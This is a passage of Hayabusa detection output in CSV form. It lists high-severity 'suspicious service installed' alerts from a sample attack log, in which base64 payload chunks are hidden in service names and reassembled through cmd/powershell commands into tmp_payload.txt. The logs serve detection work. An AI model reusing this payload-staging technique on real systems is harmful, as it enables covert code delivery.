+09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbn | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg83"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:14.610 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbn | Path: c:\windows\system32\cmd.exe /c powershell -command 
""Get-Service ""seg83"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:16.058 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCg0KICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg84"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:16.058 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: VtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCg0KICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg84"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:16.058 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCg0KICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg84"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:17.508 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gQ3JlYXRlIGEgbG9nIHJlcG9ydCBmb3IgdGhlIGVhY2ggY29tcHV0ZXIgaW4gdGhlIGNvbXB1dGVyIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg85"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:17.508 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gQ3JlYXRlIGEgbG9nIHJlcG9ydCBmb3IgdGhlIGVhY2ggY29tcHV0ZXIgaW4gdGhlIGNvbXB1dGVyIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg85"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:17.508 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 
IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gQ3JlYXRlIGEgbG9nIHJlcG9ydCBmb3IgdGhlIGVhY2ggY29tcHV0ZXIgaW4gdGhlIGNvbXB1dGVyIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg85"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:18.961 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: xpc3QNCg0KI0BwYXJhbSAkTG9nTmFtZSAgICAgICAgICAgIC0+ICBUaGUgRXZlbnQgTG9nDQojQHBhcmFtICRBdmdFdmVudHNQZXJTZWNvbmQgLT4gIFRoZSBhdmcgZXZlbnRzIHBlciBzZWNvbmQg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg86"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:18.961 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: xpc3QNCg0KI0BwYXJhbSAkTG9nTmFtZSAgICAgICAgICAgIC0+ICBUaGUgRXZlbnQgTG9nDQojQHBhcmFtICRBdmdFdmVudHNQZXJTZWNvbmQgLT4gIFRoZSBhdmcgZXZlbnRzIHBlciBzZWNvbmQg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg86"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:18.961 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious 
Service Possibly Installed,"Svc: xpc3QNCg0KI0BwYXJhbSAkTG9nTmFtZSAgICAgICAgICAgIC0+ICBUaGUgRXZlbnQgTG9nDQojQHBhcmFtICRBdmdFdmVudHNQZXJTZWNvbmQgLT4gIFRoZSBhdmcgZXZlbnRzIHBlciBzZWNvbmQg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg86"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:20.414 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Zm9yIHRoZSBnaXZlbiBsb2cNCiNAcGFyYW0gJFRvdGFsTG9nRXZlbnRzICAgICAtPiAgVGhlIHRvdGFsICMgb2YgZXZlbnRzIGZvciB0aGUgZ2l2ZW4gbG9nDQoNCiMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg87"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:20.414 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Zm9yIHRoZSBnaXZlbiBsb2cNCiNAcGFyYW0gJFRvdGFsTG9nRXZlbnRzICAgICAtPiAgVGhlIHRvdGFsICMgb2YgZXZlbnRzIGZvciB0aGUgZ2l2ZW4gbG9nDQoNCiMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg87"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:20.414 
+09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Zm9yIHRoZSBnaXZlbiBsb2cNCiNAcGFyYW0gJFRvdGFsTG9nRXZlbnRzICAgICAtPiAgVGhlIHRvdGFsICMgb2YgZXZlbnRzIGZvciB0aGUgZ2l2ZW4gbG9nDQoNCiMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg87"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:21.867 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KZnVuY3Rpb24gQ3JlYXRlLUxvZ1JlcG9ydCB7IHBh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg88"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:21.867 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KZnVuY3Rpb24gQ3JlYXRlLUxvZ1JlcG9ydCB7IHBh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg88"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 17:17:21.867 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KZnVuY3Rpb24gQ3JlYXRlLUxvZ1JlcG9ydCB7IHBh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg88"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:23.325 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cmFtKCRDb21wdXRlcmxpc3QsICRDb21wdXRlckNvdW50LCAkQ29tcHV0ZXJMaXN0VHlwZSwgJE9TKSAgICANCg0KICAgIHRyeSB7DQogICAgICAgIA0KICAgICAgICAkUmVwb3J0ID0gQHt9DQogIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg89"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:23.325 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: cmFtKCRDb21wdXRlcmxpc3QsICRDb21wdXRlckNvdW50LCAkQ29tcHV0ZXJMaXN0VHlwZSwgJE9TKSAgICANCg0KICAgIHRyeSB7DQogICAgICAgIA0KICAgICAgICAkUmVwb3J0ID0gQHt9DQogIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg89"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service 
execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:23.325 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cmFtKCRDb21wdXRlcmxpc3QsICRDb21wdXRlckNvdW50LCAkQ29tcHV0ZXJMaXN0VHlwZSwgJE9TKSAgICANCg0KICAgIHRyeSB7DQogICAgICAgIA0KICAgICAgICAkUmVwb3J0ID0gQHt9DQogIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg89"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:24.762 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICRQcm9ncmVzc0NvdW50ID0gMDsgICAgICAgIA0KDQogICAgICAgIGlmICgkQ29tcHV0ZXJMaXN0VHlwZSAtTkUgJExPQ0FMSE9TVF9PUFQpIHsNCg0KICAgICAgICAgICAgJEdsb2JhbDpD | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg90"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:24.762 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICRQcm9ncmVzc0NvdW50ID0gMDsgICAgICAgIA0KDQogICAgICAgIGlmICgkQ29tcHV0ZXJMaXN0VHlwZSAtTkUgJExPQ0FMSE9TVF9PUFQpIHsNCg0KICAgICAgICAgICAgJEdsb2JhbDpD | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg90"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:24.762 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICRQcm9ncmVzc0NvdW50ID0gMDsgICAgICAgIA0KDQogICAgICAgIGlmICgkQ29tcHV0ZXJMaXN0VHlwZSAtTkUgJExPQ0FMSE9TVF9PUFQpIHsNCg0KICAgICAgICAgICAgJEdsb2JhbDpD | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg90"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:26.229 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cmVkID0gR2V0LUNyZWRlbnRpYWwgLU1lc3NhZ2UgIkVudGVyIGFuIGFjY291bnQgd2hpY2ggaGFzIGFjY2VzcyB0byB0aGUgV2luZG93cyBFdmVudCBMb2dzIg0KICAgICAgICB9DQoNCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg91"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:26.229 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: cmVkID0gR2V0LUNyZWRlbnRpYWwgLU1lc3NhZ2UgIkVudGVyIGFuIGFjY291bnQgd2hpY2ggaGFzIGFjY2VzcyB0byB0aGUgV2luZG93cyBFdmVudCBMb2dzIg0KICAgICAgICB9DQoNCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg91"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: 
LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:26.229 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cmVkID0gR2V0LUNyZWRlbnRpYWwgLU1lc3NhZ2UgIkVudGVyIGFuIGFjY291bnQgd2hpY2ggaGFzIGFjY2VzcyB0byB0aGUgV2luZG93cyBFdmVudCBMb2dzIg0KICAgICAgICB9DQoNCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg91"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:27.683 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICBGb3JFYWNoICgkQ29tcHV0ZXIgaW4gJENvbXB1dGVybGlzdCkgew0KICAgICAgICAgICAgDQogICAgICAgICAgICAkUHJvZ3Jlc3ND | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg92"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:27.683 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICBGb3JFYWNoICgkQ29tcHV0ZXIgaW4gJENvbXB1dGVybGlzdCkgew0KICAgICAgICAgICAgDQogICAgICAgICAgICAkUHJvZ3Jlc3ND | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg92"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:27.683 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICBGb3JFYWNoICgkQ29tcHV0ZXIgaW4gJENvbXB1dGVybGlzdCkgew0KICAgICAgICAgICAgDQogICAgICAgICAgICAkUHJvZ3Jlc3ND | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg92"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:29.154 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: b3VudCA9ICRQcm9ncmVzc0NvdW50ICsgMQ0KDQogICAgICAgICAgICAkUmVtb3RlQ29tcHV0ZXIgPSAkZmFsc2UNCg0KICAgICAgICAgICAgaWYoJFByb2dyZXNzQ291bnQgLUVRIDEpIHsNCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg93"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:29.154 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: b3VudCA9ICRQcm9ncmVzc0NvdW50ICsgMQ0KDQogICAgICAgICAgICAkUmVtb3RlQ29tcHV0ZXIgPSAkZmFsc2UNCg0KICAgICAgICAgICAgaWYoJFByb2dyZXNzQ291bnQgLUVRIDEpIHsNCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg93"" | select -Expand 
DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:29.154 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: b3VudCA9ICRQcm9ncmVzc0NvdW50ICsgMQ0KDQogICAgICAgICAgICAkUmVtb3RlQ29tcHV0ZXIgPSAkZmFsc2UNCg0KICAgICAgICAgICAgaWYoJFByb2dyZXNzQ291bnQgLUVRIDEpIHsNCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg93"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:30.607 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgICANCiAgICAgICAgICAgICAgICBXcml0ZS1Mb2cgJElORk9fTE9HICJDYWxjdWxhdGluZyAmIFByb2Nlc3NpbmcgTG9nIEVQUyBGb3IgQ29tcHV0ZXIgTGlzdCIgDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg94"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:30.607 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICAgICAgICANCiAgICAgICAgICAgICAgICBXcml0ZS1Mb2cgJElORk9fTE9HICJDYWxjdWxhdGluZyAmIFByb2Nlc3NpbmcgTG9nIEVQUyBGb3IgQ29tcHV0ZXIgTGlzdCIgDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command 
""Get-Service ""seg94"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:30.607 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgICANCiAgICAgICAgICAgICAgICBXcml0ZS1Mb2cgJElORk9fTE9HICJDYWxjdWxhdGluZyAmIFByb2Nlc3NpbmcgTG9nIEVQUyBGb3IgQ29tcHV0ZXIgTGlzdCIgDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg94"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:32.038 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICB9IA0KDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLU5FICRMT0NBTEhPU1RfT1BUKSB7DQoNCiAgICAgICAgICAgICAgICAkUmVtb3RlQ29tcHV0ZXIgPSAkdHJ1ZQ0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg95"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:32.038 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgICB9IA0KDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLU5FICRMT0NBTEhPU1RfT1BUKSB7DQoNCiAgICAgICAgICAgICAgICAkUmVtb3RlQ29tcHV0ZXIgPSAkdHJ1ZQ0KIC | Path: 
